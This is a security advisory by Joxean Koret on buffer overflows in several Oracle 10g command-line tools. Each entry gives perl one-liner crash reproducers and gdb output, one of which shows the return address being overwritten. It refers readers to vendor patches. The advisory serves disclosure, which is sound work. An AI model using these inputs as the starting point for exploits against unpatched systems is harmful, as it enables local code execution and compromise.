--------------------------------------------------------------------------- Various Buffer Overflows in Oracle 10g Tools --------------------------------------------------------------------------- Author: Jose Antonio Coret (Joxean Koret) Date: 2004, 2005 Location: Basque Country --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Oracle10g - Version 10.1.0.3.0 Web : http://www.oracle.com --------------------------------------------------------------------------- Vulnerability List: ~~~~~~~~~~~~~~~~~~~ A.- Oracle XML Developers Kit 10.1.0.3.0 - Production B.- Kerberos Utilities: Version 10.1.0.3.0 - Production C.- Configuration tool for Oracle Cluster Registry D.- NMUCT Program E.- MAPSGA - An utility to dump the SGA F.- NLS Data Installation Utility: Version 10.1.0.3.0 - Production G.- NLS Binary Message File Generation Utility: Version 10.1.0.3.0 - Production H.- IMPDP y EXPDP: Release 10.1.0.3.0 - Production I.- Genezi Client Shared Library 32-bit - 10.01.00.03.00 Vulnerabilities: ~~~~~~~~~~~~~~~~ A.- Oracle XML Developers Kit 10.1.0.3.0 - Production A1. BOF in stylesheet argument Oracle10g Database Servers XSL processor tool called XSL is vulnerable to buffer overflows. This may allow to run arbitrary code. A2. Samples joxean@nemobox:/data/oracle/bin$ ./xsl -B a `perl -e 'print "a"x2272;'` oracle Segmentation fault joxean@nemobox:/data/oracle/bin$ ./xsl -f `perl -e 'print "a"x2272;'` oracle Segmentation fault NOTE: Argument must be more than 2272 character long. joxean@nemobox:/data/oracle/bin$ gdb ./xsl (bla, bla, bla...) This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1". (gdb) run -B a `perl -e 'print "a"x2272;'` oracle Starting program: /data/oracle/bin/xsl -B a `perl -e 'print "a"x2272;'` oracle [Thread debugging using libthread_db enabled] [New Thread 16384 (LWP 8457)] Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 16384 (LWP 8457)] 0x61616161 in ?? () (gdb) print $ebp $1 = (void *) 0x61616161 (gdb) print $ebp+4 $2 = (void *) 0x61616165 (gdb) quit The program is running. Exit anyway? (y or n) y joxean@nemobox:/data/oracle/bin$ We have been overwrite the return address with 0x61616161, the 'a' character B.- Kerberos Utilities: Version 10.1.0.3.0 - Production B1. BOF in cachename parameter The Oracle10g Database Server Kerberos Utilities are vulnerables to buffer overflows. This may allow to run arbitrary code. B2. Samples joxean@nemobox:/data/oracle/bin$ ./oklist -c `perl -e 'print "a"x300;'` Kerberos Utilities for Linux: Version 10.1.0.3.0 - Production on 11-NOV-2004 18:52:28 Copyright (c) 1996, 2002 Oracle. All rights reserved. Segmentation fault joxean@nemobox:/data/oracle/bin$ ./okdstry -c `perl -e 'print "x"x6000;'` Kerberos Utilities for Linux: Version 10.1.0.3.0 - Production on 11-NOV-2004 18:59:59 Copyright (c) 1996, 2002 Oracle. All rights reserved. Segmentation fault C.- Configuration tool for Oracle Cluster Registry C1. Upgrade argument Buffer Overflow The Oracle10g Database Server OCRCONFIG tool is vulnerable to buffer overflows. This may allow to run arbitrary code. C2. Sample joxean@nemobox:/data/oracle/bin$ ./ocrconfig `perl -e 'print "a"x6000;'` Segmentation fault D.- NMUCT Program D1. NMUCT??? I don't known for what purposes serves this Oracle10g tool (?) but this is vulnerable to buffer overflows (any parameter!). D1. Samples joxean@nemobox:/data/oracle/bin$ ./nmuct `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'` Now in main .... Segmentation fault Next tests : joxean@nemobox:/data/oracle/bin$ ./nmuct a a a a `perl -e 'print "a"x6000;'` a Now in main .... Segmentation fault joxean@nemobox:/data/oracle/bin$ ./nmuct a a a `perl -e 'print "a"x6000;'` a a Now in main .... Segmentation fault joxean@nemobox:/data/oracle/bin$ ./nmuct a a `perl -e 'print "a"x6000;'` a a a Now in main .... Segmentation fault joxean@nemobox:/data/oracle/bin$ ./nmuct a `perl -e 'print "a"x6000;'` a a a a Now in main .... Segmentation fault joxean@nemobox:/data/oracle/bin$ ./nmuct `perl -e 'print "a"x6000;'` a a a a a Now in main .... Segmentation fault Almost any argument in this program is vulnerable to BOFs E.- MAPSGA - An utility to dump the SGA E1. BOF at the first argument The Oracle10g Database Server MAPSGA tool is vulnerable to buffer overflows. This may allow to run arbitrary code. E2. Sample(s) joxean@nemobox:/data/oracle/bin$ ./mapsga `perl -e 'print "a"x60000;'` Segmentation fault joxean@nemobox:/data/oracle/bin$ gdb mapsga (more bla, bla, bla...) This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1". (gdb) run `perl -e 'print "x"x6000;'` Starting program: /data/oracle/bin/mapsga `perl -e 'print "x"x6000;'` [Thread debugging using libthread_db enabled] [New Thread 16384 (LWP 28581)] Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 16384 (LWP 28581)] 0x41044390 in getenv () from /lib/libc.so.6 (gdb) print $ebp $1 = (void *) 0xbfffd9f4 (gdb) print $ebp+4 $2 = (void *) 0xbfffd9f8 (gdb) quit The program is running. Exit anyway? (y or n) y F.- NLS Data Installation Utility: Version 10.1.0.3.0 - Production F1. Another BOF The Oracle10g Database Server NLS Data Installation Utility is vulnerable to buffer overflows. This may allow to run arbitrary code. F2. Samples joxean@nemobox:/data/oracle/bin$ ./lxinst `perl -e 'print "x"x6000;'` NLS Data Installation Utility: Version 10.1.0.3.0 - Production Copyright (c) Oracle 1993, 2004. All rights reserved. CORE 10.1.0.3.0 Production Segmentation fault joxean@nemobox:/data/oracle/bin$ gdb lxinst (And more bla, bla, bla...) This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1". (gdb) run `perl -e 'print "x"x6000;'` Starting program: /data/oracle/bin/lxinst `perl -e 'print "x"x6000;'` [Thread debugging using libthread_db enabled] [New Thread 16384 (LWP 29664)] NLS Data Installation Utility: Version 10.1.0.3.0 - Production Copyright (c) Oracle 1993, 2004. All rights reserved. CORE 10.1.0.3.0 Production Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 16384 (LWP 29664)] 0x4109045d in mempcpy () from /lib/libc.so.6 (gdb) run `perl -e 'print "x"x60000;'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /data/oracle/bin/lxinst `perl -e 'print "x"x60000;'` [Thread debugging using libthread_db enabled] [New Thread 16384 (LWP 29696)] NLS Data Installation Utility: Version 10.1.0.3.0 - Production Copyright (c) Oracle 1993, 2004. All rights reserved. CORE 10.1.0.3.0 Production Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 16384 (LWP 29696)] 0x4109045d in mempcpy () from /lib/libc.so.6 G.- NLS Binary Message File Generation Utility: Version 10.1.0.3.0 - Production G1. Another BOF :) The Oracle10g NLS Binary Message File Generation Utility tool is vulnerable to buffer overflows. This may allow to run arbitrary code. G2. Samples joxean@nemobox:/data/oracle/bin$ ./lmsgen `perl -e 'print "x"x6000;'` `perl -e 'print "x"x6000;'` `perl -e 'print "x"x6000;'` NLS Binary Message File Generation Utility: Version 10.1.0.3.0 - Production Copyright (c) Oracle 1979, 2004. All rights reserved. CORE 10.1.0.3.0 Production Input file name too long: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx (...) Can't open message file xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx. Incorrect number of arguments specified! Syntax: LMSGEN <text file> <product> <facility> [language] [-i indir] [-o outdir] Where <text file> is a message text file <product> the name of the product <facility> the name of the facility [language] optional message language in <language>_<territory>.<character set> format This is required if message file is not tagged properly with language [-i indir] optional directory where to locate the text file [-o outdir] optional directory where to put the generated binary file. Segmentation fault Another easy test: lmsgen `perl -e 'print "x"x6000;'` a a H.- IMPDP y EXPDP: Release 10.1.0.3.0 - Production H1. Buffer overflow in EXPDP and IMPDP tools The Oracle10g Database Server Data Pump IMPORT and EXPORT tools (calleds impdp and expdp) are vulnerable to buffer overflows. This may allow code execution. H2 Samples joxean@nemobox:/data/oracle/bin$ ./impdp `perl -e 'print "a"x60000;'` Segmentation fault joxean@nemobox:/data/oracle/bin$ ./expdp `perl -e 'print "x"x5000;'` Export: Release 10.1.0.3.0 - Production on Thursday, 11 November, 2004 20:27 Copyright (c) 2003, Oracle. All rights reserved. Segmentation fault I.- Genezi Client Shared Library 32-bit - 10.01.00.03.00 I1. Another BOF The Oracle10g Database Server Genezi tool is vulnerable to buffer overflows. This may allow to run arbitrary code. I2. Samples joxean@nemobox:/data/oracle/bin$ ./genezi -c `perl -e 'print "x"x5000;'` Segmentation fault The fix: ~~~~~~~~ Oracle has been released patches for these and more issues. Patches are available to dowwload from the MetaLink site, at http://metalink.oracle.com Disclaimer: ~~~~~~~~~~~ The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. --------------------------------------------------------------------------- Contact: ~~~~~~~~ Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
Attachment:
signature.asc
Description: This is a digitally signed message part